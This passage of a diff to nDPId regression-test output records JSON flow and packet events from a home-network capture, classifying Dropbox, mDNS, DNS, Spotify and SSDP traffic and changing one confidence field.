NzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588779601447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1588779601447,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJZAAEARYHvAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAM98X0EAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1588779603292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1588779603292,"pkt":"AQBeAAD7wJrQLWJ0CABFAACnQj4AAP8R1i7AqAE14AAA+xTpFOkAk34YAAAAAAAFAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQ9fY29tcGFuaW9uLWxpbmvAFQAMgAEFX3Jhb3DAFQAMgAEIX2FpcnBsYXnAFQAMgAEMX3NsZWVwLXByb3h5BF91ZHDAGgAMgAEAACkFoAAAEZQAEgAEAA4AMeKa0C1idMCa0C1idA=="} -00688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1588779603292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":201,"pkt_l4_len":147,"thread_ts_msec":1588779603292,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAJMR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QCTHG8AAAAAAAUAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABD19jb21wYW5pb24tbGlua8AVAAyAAQVfcmFvcMAVAAyAAQhfYWlycGxhecAVAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAaAAyAAQAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"} -00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1588779603320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1588779603320,"pkt":"wJrQLWJ0KDc3AG3ICABFAAEyUGUAAP8R5oLAqAFNwKgBNRTpFOkBHhkkAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="} -00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1588779604297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1588779604297,"pkt":"AQBeAAD7wJrQLWJ0CABFAADgDXQAAP8RCsDAqAE14AAA+xTpFOkAzL4AAAAAAAADAAMAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQ9fY29tcGFuaW9uLWxpbmvAFQAMAAEMX3NsZWVwLXByb3h5BF91ZHDAGgAMAAHAJQAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AlwCUADAABAAARlAAOC0x1Y2EncyBpUGFkwCXAOwAMAAEAABGUABIPNTAtMzUtMTAtNzAuMSAxwDsAACkFoAAAEZQAEgAEAA4AMeKa0C1idMCa0C1idA=="} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1588779604297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":258,"pkt_l4_len":204,"thread_ts_msec":1588779604297,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAMwR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QDMXFcAAAAAAAMAAwAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADAABD19jb21wYW5pb24tbGlua8AVAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAaAAwAAcAlAAwAAQAAEZQAEA1MdWNh4oCZcyBpTWFjwCXAJQAMAAEAABGUAA4LTHVjYSdzIGlQYWTAJcA7AAwAAQAAEZQAEg81MC0zNS0xMC03MC4xIDHAOwAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"} 00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1588779604398,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1588779604398,"pkt":"jP5XIzfkKDc3AG3ICABFAAEy\/rUAAP8ROBzAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588779606465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1588779606465,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJdAAEARYHrAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABAmSTUAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} -00694{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1588779596464,"flow_last_seen":1588779607307,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1588779607307,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}} +00694{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1588779596464,"flow_last_seen":1588779607307,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1588779607307,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}} 00602{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1588779607308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"thread_ts_msec":1588779607308,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAGwR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsCTwAAAAAAAEAAQAAAAEMX3NsZWVwLXByb3h5BF91ZHAFbG9jYWwAAAwAAcAMAAwAAQAAEZEAEg81MC0zNS0xMC03MC4xIDHADAAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"} -00706{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779603292,"flow_last_seen":1588779607308,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1588779607308,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}} +00706{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779603292,"flow_last_seen":1588779607308,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1588779607308,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1588779607374,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1588779607374,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA9u6QAAP8RfGzAqAFNwKgBAcuWADUAKd8a0oUBAAABAAAAAAAAAmluCWFwcGNlbnRlcgJtcwAAAQAB"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779607374,"flow_last_seen":1588779607374,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1588779607374,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1588779607388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1588779607388,"pkt":"KDc3AG3IEBMx8Tl2CABFAADD2ppAADkR4vDAqAEBwKgBTQA1y5YArwAA0oWBgAABAAMAAAAAAmluCWFwcGNlbnRlcgJtcwAAAQABwAwABQABAAAAXQAuGWluMi1wcm9kLWVhc3QtdXMyLTIzZmEzMzAOdHJhZmZpY21hbmFnZXIDbmV0AMAtAAUAAQAAAAsAMBNpbjItZ3cyLTA0LWVkZTZmMDZlB2Vhc3R1czIIY2xvdWRhcHAFYXp1cmUDY29tAMBnAAEAAQAAAAUABBQsTvs="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779607388,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"20.44.78.251"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779607388,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"in.appcenter.ms","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"20.44.78.251"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1588779608134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779608134,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABEQD4AAEARtebAqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779608134,"flow_last_seen":1588779608134,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779608134,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1588779611135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779611135,"pkt":"\/\/\/\/\/\/\/\/wJrQLWJ0CABFAABE4wYAAEAREx7AqAE1wKgB\/+EV4RUAMNBmU3BvdFVkcDClWtsnvt2XzwABAACyJIr8D\/N2Z9WO7tpCHKgrvJhaBg=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779611355,"flow_last_seen":1588779611355,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":125,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779611355,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 